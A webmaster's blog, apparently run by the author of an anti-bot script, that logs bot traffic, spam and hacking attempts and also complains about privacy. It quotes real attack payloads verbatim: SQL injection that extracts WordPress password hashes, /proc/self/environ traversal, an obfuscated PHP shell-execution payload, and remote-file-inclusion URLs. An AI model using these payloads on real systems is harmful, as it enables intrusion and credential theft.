Web Robots

New upload

2012-03-30T16:38:00.000-05:00

M&M autobam v4.8 has been uploaded. This version adds country ban by ip

webmasters how to disable google related

2011-12-16T10:59:00.005-06:00

From :http://www.lunarlog.com/google-related-privacy/
Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.

File a complaint here https://www.ftccomplaintassistant.gov/

Google Related Program and My Privacy Issues

I spent the last couple of weeks updating my main website Lunarstudio - mostly reprogramming and adding new images. When updating websites, most responsible webmasters and designers will run their site through additional browsers, operating systems, and test people’s reactions to new content. I had a friend look at my site on Sunday to see if she had any feedback. Out of the corner of my eye, I noticed a full-width bar appear at the bottom of my page on her monitor. My first reaction was “WTF”, followed by concern that somehow I must have uploaded malware to the back-end of my site. The third option which was slightly more worrisome is that some hackers got into my site. So I took a closer look, and the bottom left read “Google Related” (don’t install this.)

Now, I would never think Google would have released a toolbar that covered up part of the screen. Not only was it distracting from the design I had worked so hard it, but it wouldn’t just affect me but almost every webmaster and designer on the planet. So my next thought that it had to be some malware she accidentally downloaded over the course of her Internet travels. Upon even closer inspection, I noticed that it was serving up advertisements and contact information from competitors. So someone looking at my site could see another image at the bottom of the screen, then decide to go to that website instead.

I started to look into this. Sure enough, it’s part of a new, 20-day old Google program which is a toolbar extension for Internet Explorer and Chrome. ArsTechnica wrote a concise article on what Google Relate does here. While it might prove useful for some users, for webmasters and those concerned with privacy, this is an absolute nightmare. It represents a major downfall in Net Neutrality if this is allowed to carry on. *Aside* — some might argue that Google is not a telecom, Internet Provider, or government agency and hence doesn’t fall into the argument of threatening Net Neutrality. However, I should remind people that Google has mentioned that it’s testing their Internet Providing services. Also, Android runs on many cellphones as well as telecom providers. They’re basically in bed with one another.

There’s several different and valid concerns, not to mention the legality of this program:

1.It interferes with a person or company’s intended website design without their permission.
2.It potentially distracts an end-user.
3.It slows down a person’s website loading time. The speed issue is probably negligible, but it’s still there without an owner’s permission.
4.It risks having people leave your website in favor of another. Holding user retention on a landing-page is tough enough, but this just adds fuel to the fire.
5.Due to people wandering off one’s website, it can jeopardize website owner’s businesses and livelihoods.
6.Google is directly (or indirectly) profiteering from someone else’s work without their permission.
7.This is potentially part of their AdWords program, which makes money off of advertisements.
8.It allows for Google to monitor your browsing habits, even when not using Google search. It’s basically spying on your activities.
9.It potentially opens up the door for further abuse.
10.It threatens Google’s competitors (Yahoo!, Bing, and other search engines.) If successful, competitors might also have to roll out similar toolbars or methods.
11.It could become a permanent part of Google Chrome.
Now, there’s some usefulness to the end-user. It wouldn’t be fair for me to mention the Google Related negatives without the positives:

1.Provides directions.
2.Provides alternative solutions for someone looking for a service or help.
I was almost positive Google would provide webmasters with a method to take this off of owner’s websites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unapproved” methods of using CSS code to disable the iframe, either by moving the toolbar off-screen, or by hiding the iframe completely. Unfortunately, I tried these methods and it didn’t work. It seems that Google caught on to webmasters changing their CSS code, and in turn updated their own to prevent us from doing so.

Since then, I’ve brought it to the attention of some friends on Facebook, however I think my concern has largely fallen on deaf ears which is understandable. I’ve also written on the Google Forum where you can see there my concern is #6. Some might call it an overreaction, but I think I’m fully justified here. The people reporting this problem is so low at the moment because Google Related is just starting to get attention. This is part of the reason why I’m writing about it on my blog — it’s to bring attention to this.

My main issue is that Google is intruding upon my work and business without permission. The nail in the coffin is that they are also potentially profiteering without my permission too. I think it’s just a matter of time before Google is:

1.Sued by competitors.
2.Department of Justice goes after them and tries to break up the monopoly.
3.Public outrage from the webmasters community gets out of control.
4.Or they disable it before it gets to any of the points listed above.
I hope I am overly concerned, and that Google disables their new program almost as soon as it has started. However, it blows my mind how this idea got past scores of lawyers, executives, management, and employees at a billion dollar company in the first place. If you agree with my concerns, please promote this article and also express your concern on the Google Related Forum. If you disagree, I’m still interested in hearing your views

"Script Injections" list

2011-03-11T11:02:00.001-06:00

Bots vs Browsers - has a new list of all injection atempts.

If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.

mas email problems

2011-03-08T08:58:00.002-06:00

I have just discovered that the email option of my script can trigger the mas email alarms on the free host. They use this alarnm to stop spammers.

If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.

go into autoban and change all mail commands to
//mail

182.114.206.25 hn.kd.ny.adsl union injection hacker

2011-03-08T08:45:00.001-06:00

20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20--

from ip 182.114.206.25 hn.kd.ny.adsl

as13448.com traffic

2010-08-26T15:06:00.002-05:00

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)
All Hits From static-208-80-194-34.as13448.com 208.80.194.34

I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com
The website as13448.com is not a ISP so all of those ips need to be blocked.

mylife.com privacy violations.

2010-05-24T09:50:00.003-05:00

Mylife.com is running TV advertisments and getting a lot of traffic so I checked them out and was shocked to see that when you go to the site and enter your name approx age and zip that the system will come back to you and display your XXX (private info)

Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.

File a complaint here https://www.ftccomplaintassistant.gov/

And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. http://www.privacyrights.org/contact

It is likely that they will not have this information for all states. If they do display private info on you please let us know.

Also see www.complaintsboard.com

Also see http://www.consumeraffairs.com/online/mylife.html

Also see Just say no to Mylife.com

Better Business Bureau
This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]

Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]

The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]

New York spam on Road Runner

2010-02-07T22:08:00.002-06:00

NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 7:25pm
very nice blog.

very nice blog. manhattanadmin@gmail.comNYC
Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam

1 #
NYC Apartments
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:44pm
interesting.

1 #
NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:28pm
very nice blog.

1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67 Submitted on 2010/02/06 at 10:45am
good blog keep it up.

good blog keep it up. admin@imagehosting21.comFree Image
Hostinghttp://www.imagehosting21.comspam

1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67

Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.

Hello,

Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not
actively monitor nor does Road Runner exercise editorial control over the content of any web site,
electronic mail transmission, mailing list, news group or other material created or accessible over
Road Runner services.

If you feel that a Road Runner subscribers activities constitute harassment and have contact
information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease
and desist" contact with you.

If you receive further contact from the Road Runner subscriber after that point, or do not have
contact information for them: DO NOT REPLY or correspond with that person further. Please instead
forward all documentation to abuse@rr.com, which should include: full email headers or webserver
logs showing posts made on a message board or other Internet forum (these would typically be
obtained from the administration of that site). Logs would need to contain the following
information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone,
Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain
text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of
the message.

Thank you for taking the time to contact Road Runner.

- Road Runner Abuse [SM]

wrangler.websitewelcome.com bot

2009-06-30T17:57:00.002-05:00

Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com

Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address.

websitewelcome.com added to the block list

useragent spamer www.ongarofrancesco.org

2009-06-30T17:50:00.003-05:00

Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK">
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it

This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org

This looks to be some hacker ref site. The bot is from Italy

This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML

IE 8 breaks subdomains making them hard to read using domain highlighting

2009-06-24T18:57:00.010-05:00

Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.

This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.

Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.

This has to be fixed.

Microsoft is taking away our legal use of subdomains.
Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.

Zdnet says IE8 puts dim wits ahead of tech savvy.

aidanwalsh.net says

why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL.

domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8

strange code on wp blog detected

2009-01-20T13:47:00.003-06:00

mmautoban has detected the following code being used on a WP blog.

Antyone know what this is.

/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20

/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20

%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}

It has about 15 other version I suspect it is some type of atack.
Unless some plugin is malfunctioning.
Anyone have any info what this code is?

OSCommerce mods

2009-01-15T15:40:00.002-06:00

OScommerce Notes
===============
A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to

/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order

This generates a +select+ injection hack detection in mmautoban.
To prevent this error edit your OSCommerce english.php file and change the error statement from
Please Select to Please Pick
this will prevent customers from getting banned.
It is unknown if other such errors exist in other places or other programs.
If you see any please report them.

'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker

2008-12-03T23:21:00.004-06:00

Just detected this hacker. the ip is block by no-more-funn.moensted.dk

What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)

www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

babycaleb.mvhosted.com hacker atacks

2008-11-20T18:10:00.004-06:00

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new url into websites.
The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.

A search shows its infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com

Send abuse messages to theplanet.com

itsapic.com/crawler.html another beta

2008-11-12T14:31:00.002-06:00

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx

This bot was scanning webing looking for sites and got blocked by BB so watch for it.
Website does not tell what its doing or ask permission to enter your site.

add to robots
User-agent: itsapic.com_crawler
Disallow: /

babycaleb.fortunecity.co.uk hacker now shut down.

2008-11-08T20:31:00.014-06:00

Am getting a lot of these request lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated-
The site has now been shutdown.

A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?

serverkompetenz.net Hackers

2008-09-11T09:54:00.004-05:00

serverkompetenz.net is a hacker not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:

 $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");

81.169.152.101 h986442.serverkompetenz.net

Bot atempted to include some script in place of its user agent string.

It then tried to remote load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

2008-08-22T22:49:00.000-05:00

The latest hack running right now is a injection atempt using a string like this.

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot atack and is comming from everywhere.
The come in 2 at a time from the same IP.

They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl See more here isc.sans.org

Also see this post which recomends.

RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]

But a better page on how to block this by .htaccess is located here.

They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.

Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.

Update hacker modules Here.

You will also want to download your databases and scan them for IFRAMES and java script.

magnum.liquidweb.com hacker

2008-08-06T09:52:00.003-05:00

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
hacker hits with this string trying to get my server to run his scripts.

then after geting banned keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

they all are scripts used by hackers to display a test message on your server
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/

2008-06-30T23:41:00.002-05:00

After banning the domain amazonaws.com because they are hosting bots.
I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com

-----Update AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com

Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam

The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

spam source means the system was found via manual spam header parsing to be the origin of spam.

update july 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com

openrbl.org is gone

2008-06-17T12:57:00.002-05:00

openrbl.org is down and I need a replacement that can do a lookup on all of the block list and do a DNS lookup.

I did find a replacement of sorts. Change the admin.php $dns_lookup setting to.

$dns_lookup ="http://www.robtex.com/rbl/";

If anyone knows of one please post it.

Request contained a malicious JavaScript or SQL injection attack

2008-06-06T12:44:00.000-05:00

bad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.

I think this may be a bug in bad behavior

Update: I am still seeing this from the Yahoo bot

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.8.122 llf520018.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.17.186 llf520164.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.22.159 llf520079.crawl.yahoo.net

// Broken spambots send URLs with various invalid characters
// Some broken browsers send the #vector in the referer field :(
if (strpos($package['request_uri'], "#") !== FALSE) {
return "dfd9b1ad";
}

robot on pox1s.craigslist.org

2008-06-02T23:57:00.001-05:00

Why would craigslist.org be running a bot?

403 Required header 'Accept' missing
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
66.150.243.17 pox1s.craigslist.org

barton.centeralnet.com bot

2008-06-01T18:08:00.002-05:00

Agent: -NO AGENT-
216.32.80.66 barton.centeralnet.com

Some type of webhosting company in IRAN